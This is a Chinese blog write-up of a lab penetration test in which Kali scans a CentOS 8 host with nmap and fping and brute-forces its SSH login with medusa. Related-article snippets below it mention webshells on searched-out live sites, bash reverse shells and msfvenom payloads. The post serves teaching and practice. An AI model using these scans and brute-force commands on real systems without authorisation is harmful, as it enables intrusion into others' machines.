记一次简单的渗透测试

最新推荐文章于 2023-01-31 09:30:00 发布
最新推荐文章于 2023-01-31 09:30:00 发布
阅读量284 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45088344/article/details/106259599
版权

实验环境:kali,centos8

1.确认靶机

因为是在同一网段下测试的,所以可以直接看本机的ip来缩小靶机的搜索范围

确定了靶机ip范围就可以用nmap搜索

在同一网段下nmap发送arp包来测试存活主机

还能用fping发送icmp包来进行三层测试

nmap -sn 192.168.5.0/24

fping -g 192.168.5.0/24 -s -a

 

 其中192.168.5.133是本机地址,范围就缩小到两个地址,对两个地址再用nmap扫描以确定目标靶机

nmap 192.168.5.2 192.168.5.131 -PU53 -sn

nmap 192.168.5.2 192.168.5.131 -PA80 -sn

nmap 192.168.5.2 192.168.5.131 -sS

nmap 192.168.5.2 192.168.5.131 -sT -p 22 --script=banner.nse

从这里就基本知道目标靶机的ip和基本信息,可以再用nmap确认靶机的OS

nmap -O 192.168.5.131

2.进入目标靶机

掌握目标机的一些信息后就可以尝试进行远程登录

用medusa和较大的字典破解目标机的username和password

medusa -M ssh -h 192.168.5.131 -U username.txt -P password.txt

 找到目标机账号密码后进入目标机

ssh root@192.168.5.131

输入密码进入目标机

成功

j.cat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试之CentOS 6.7靶机实验
浅浅的博客
04-20 3911
一、实验环境 测试机:Kali 靶机:CentOS 6.7 两台虚拟主机需在同一局域网中。 二、实验步骤 一)主动信息收集 1、主机发现 nmap 192.168.247.0/24 -sn //-sn 只做主机发现,不做端口扫描 2、端口扫描,发现只有22号端口开放 nmap -sS 192.168.247.140 -p 1-65535 --open ...
【网络安全一次简单渗透测试实战
kali_Ma的博客
09-23 3169
整个渗透过程(尤其是提权过程)都异常的顺利,虽然通过辅助平台查询后发现有多个漏洞可以利用,但没想到msf的getsystem直接就拿下了最高权限。
刚入门小黑客一次对某站点的渗透测试(bypass)
kjuhfkicf154的博客
01-31 1420
渗透已授权。非授权渗透是违法行为!
一次渗透测试实战
zhangge3663的博客
11-02 1386
0X01 突破边界拿下shell 周末在家闲着没事突然就想搞事情了,然后使用Google hack语法输入inurl:xxx.xxx.xxx/upload批量搜索可能存在上传点的网站,试了好几个最后找到一个可利用的上传点。 注:涉及敏感信息,图片仅供参考,具体内容自行填充。 0X02 反弹shell&提权 Linux下需要把shell反弹出来以方便我们操作,但是目标主机上既没有nc也没有python,查询相关资料后尝试了一下利用bash弹shell。需要一台公网服务器,使用命令ba.
一次不完整的渗透1
08-08
一次不完整的渗透测试 本文将详细介绍一次渗透测试的过程,从目标选择到最终的提权过程。该测试的目标是一个理工大学的网站,使用 phpCMS 3.0 版本搭建。 首先,对目标进行了大致的踩点,查看网站的外观和结构。...
safe3wvs渗透测试扫描工具
10-28
"safe3wvs"是一款专门用于渗透测试的扫描工具,它以其简洁的界面、简单的操作流程和流畅的运行性能受到了用户的青睐。在多线程环境下,它的性能表现出色,能够有效地提升扫描效率。 渗透测试扫描工具的主要功能包括...
一个简单的学生信息管理系统
最新发布
03-19
Java是一种面向对象的语言,以其“一次编写,到处运行”的跨平台特性而闻名。它的强类型、垃圾回收机制和丰富的类库为开发提供了便利。对于学生信息管理系统,我们主要会用到Java的面向对象编程和文件I/O操作。 1. ...
参考资料-J127-F(渗透检测报告)续表.zip
03-01
【描述】该描述简单明了,直接指出了压缩包内的内容——"参考资料-J127-F(渗透检测报告)续表.zip",意味着这份文档是J127-F渗透测试项目的补充材料,可能包含前一份报告未涵盖的详细数据、分析结果或后续行动建议...
安卓java读取网页源码-Growth-Diary:本项目仅用于录团队内部分享议题及一些大事件,录团队成长的过程
06-06
一次渗透测试 licong 3月16日 : 小组 分享议题 分享人 AI组 文本分类检测webshell Mang0 企业安全组 android逆向基础实战 阿蓝 CTF组 awd经验和练习 xjseck 代码审计组 文件读取引发的思考 ama666 3月02日 : ...
简单渗透思路
weixin_54072578的博客
11-28 602
内网渗透和外网渗透的区别: 外网更侧重于找漏洞寻找突破口,而内网更侧重于你对目标的熟悉程度。 举个例子我们想到一个房间去窃取(或者获取)一个目标,那么首先我们需要的是外网渗透,先打开这个房间的门,进入到房间里面。作为白帽子,我们需要寻找并利用一些漏洞去突破这道门,进入房间。 而内网渗透的就是我们已经进入房间,这个阶段就考验我们对环境是否熟悉,怎样绕开监控,避开敏感信息在重重关卡之下拿到我们需要的目标。 从外网到内网的渗透过程 首先是信息收集 首先是登录网站收集信息,查看版本cms版本信息
一次简单渗透测试流程
qq_45773001的博客
07-21 717
一次简单渗透测试(从信息收集到远程桌面登录) 一.信息收集 你是否做了足够的信息收集? 第一次拿到这个页面之后尝试了用一些常用的密码登录,发现不可以登录; 之后查看页面源代码,审查元素发现得到一些信息,他是php语言,用的是IIS7.5; 然后进行端口扫描,目录爆破;(这里使用nmap和御剑) 扫描目录后发现www,zip是网站所有的目录,审查的时候发现了账号密码; 二.网页中的敏感信息 网站中经常会有一些敏感信息泄露出来 三.登录网站之后有没有新的漏洞发现 登录成功之后可以利用bp抓包分
简单渗透攻击
weixin_53443776的博客
03-20 7712
针对win(7/10)的简单渗透攻击 前言 这次只是个人的简单实验,请各位学习后不要用于不良途径,可以自行学习,但不要乱用哦! (!!!学习网络安全法!!!) 一、需要用到的工具 VMware(建议版本是15-16),分别有一台已经搭建好的kali与win(7/10)虚拟机 二、使用步骤 1.使用msf exploit入侵电脑(Win7/Win10皆可) 需要的工具:msfvenom . msfconsole (kali里面有) 制作一个简单的恶意软件,代码如下: msfvenom -p windows/m
一次完整的渗透测试
LiuWang0314的博客
05-21 2199
目录前言掉坑起因(通达OA前台任意用户登录)掉坑过程一(上传webshell问题)掉坑过程二(cmdshell提权问题)如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 前言 本次渗透测试过程大概是这样的:通达OA前台任意用户登录-上传webshell-获取相关信息-提权c
一次有趣的渗透测试
hl1293348082的专栏
05-16 290
最近在做渗透测试的练习中遇到一个比较有意思的站点,在此录下来,希望能给向我一样刚入安全圈不久的萌新提供一些基本思路吧。 在拿到目标站点的域名时,首要的工作肯定是进行一系列的信息搜集工作,具体搜集哪些信息以及怎么有效搜集,可以参考 Google 或者百度。 下面为了文章的简洁性,我只提及我会利用到的一些站点信息。 首先网站的真实 IP 并没有隐藏在 CDN 后面,直接在 ThreadBook 上查看同 IP 的旁站,显示足足 189 个! 看到这个数的时候,说实话内心是沉重的,虽然可以从众多的旁
利用MS12-020进行的一次简单渗透测试
热门推荐
meyo的博客
09-12 2万+
一、 实验目的 掌握Nmap扫描器的安装与使用; 掌握Nmap进行远程OS检测的原理; 掌握Nessus在本机或远程控制,进行漏洞分析扫描; 掌握Metasploit对目标漏洞的利用; 运用Nmap、Nessus、Metasploit进行一次简单的内网渗透; 该实验为综合性实验。 二、 实验原理及方法 用Nmap对目标主机进行扫描,从而得到目标主机的主机发现、端口扫描、应用与版本侦测、...
一次简单的web渗透测试
WWE135的博客
04-03 2160
0x01初期探索        用google语法 inurl:php?id=查找有漏洞的页面0x20开始寻找注入漏洞        1.通过简单的sql语句探测(',and 1=1,and 1=2)得出该sql注入为字符型注入(sql语句为:' and '1'='2)              2.构造错误的sql语句,使其爆出数据库类型               3.检测字段数(sql语句:...
一次完整的渗透测试流程
05-23
一次完整的渗透测试流程通常分为以下几个步骤: 1. 阶段一:信息收集 这个阶段是为了获取目标系统的信息,包括IP地址、域名、网络拓扑结构、操作系统、服务、应用程序等等。渗透测试人员可以使用各种工具和技术,如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值